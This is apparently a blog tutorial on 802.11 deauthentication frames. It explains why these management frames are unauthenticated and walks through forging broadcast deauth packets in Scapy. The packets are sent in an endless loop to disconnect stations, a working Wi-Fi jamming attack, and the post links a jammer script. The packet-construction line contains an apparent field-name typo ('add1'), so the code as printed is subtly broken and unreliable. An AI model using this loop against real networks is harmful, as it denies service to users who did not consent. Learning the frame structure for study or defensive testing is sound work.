by vault . 05 June 2018
In this tutorial, we are going to get through the body of 802.11 deauthentication frame. Our ultimate goal will be to terminate a connection between two stations, communicating with each other for data transmission. Note that sometimes deauthentication frame is also referred to as dissociation frame. But they are not the same tough they share the same structure and same fields.
If you'd ever get a chance to use aireplay-ng or mdk3, you might've wondered how you could be able to dissociate a client from it's AP. That's where dissociation is performed. Both of these are counted as management frames which are not supposed to be authenticated. Hence, the receiver doesn't know that who is the real originator of the received frame.
Deauth frames are used to terminate a session between two stations. It's not important who is originating the packet but who is it intended for. A station can still make a connection after the dissociation has been performed. As soon as the packet reaches its destination, the receiver cut off itself from the sender. Some of the important Dot11 Mac headers for a deauth frame.
Graphical Plot of a deauth frame:
The deauth frame comprised of three fields:
Deauth in Scapy
Now, we will transmit some of the deauthentication frame over the air using scapy. First of all, surely we would need scapy. So, install it:
sudo pip install scapy # OR (Python 3) sudo pip3 install scapy
Now, launch the Python interactive shell by giving the python directive:
Now getting on to the point, we have to form a deauthentication packet first. Import the required layers from scapy and form a deauth packet.
>>> from scapy.layers.dot11 import RadioTap, Dot11, Dot11Deauth
Forging the packet would go like...
>>> pkt = RadioTap() / Dot11(add1="FF:FF:FF:FF:FF:FF", addr2="FF:FF:FF:FF:FF:FF", addr3="FF:FF:FF:FF:FF:FF") / Dot11Deauth(reason=2)
Note the fields:
Now, to send the packet:
>>> while True: ... sendp(pkt, iface="wlan0mon", verbose=False)
Reason Codes :
Deauth packet contains a field reason which explains why the connection is being terminated. Here are some of the few common used reason codes:
|2||Previous authentication is no longer valid|
|3||STA is leaving or has left|
|4||Dissociated due to inactivity|
|5||AP is unable to cope with all associated STAs.|
|6||Class 2 Frame received from nonauthenticated STA|
|7||Class 3 Frame received from nonassociated STA|
|8||Because sending STA is leaving|
|9||STA request is not authenticated with responding STA|
|10||Because Information in the Power Capability element is unacceptable.|
So, that's how you can get started with your first script like aireplay-ng. Whatever, here's a captured deauthentication packet in scapy:
From the above highighted field, it is clear that the packet was sent from c8:3a:35:55:0c:f0 to broadcast address which means every other station the sender is connected to. In comparison with this, it would be better if the bssid of target station is directly specified. So, the target must know that this packet is orignated especially for him and he must have to accept it.
So, we saw the structure of 802.11 deauthentication packet and now you be able to forge your own packet and build something like aireplay or mdk3. Both of these are very powerful tools. I've coded a small script for you to test and read a little more deeper yourself. Here's the link on github: maximMole/WiFiJammer.py. The script does the pretty nice work of explaining and collecting nearby wireless networks and forge deauth packets.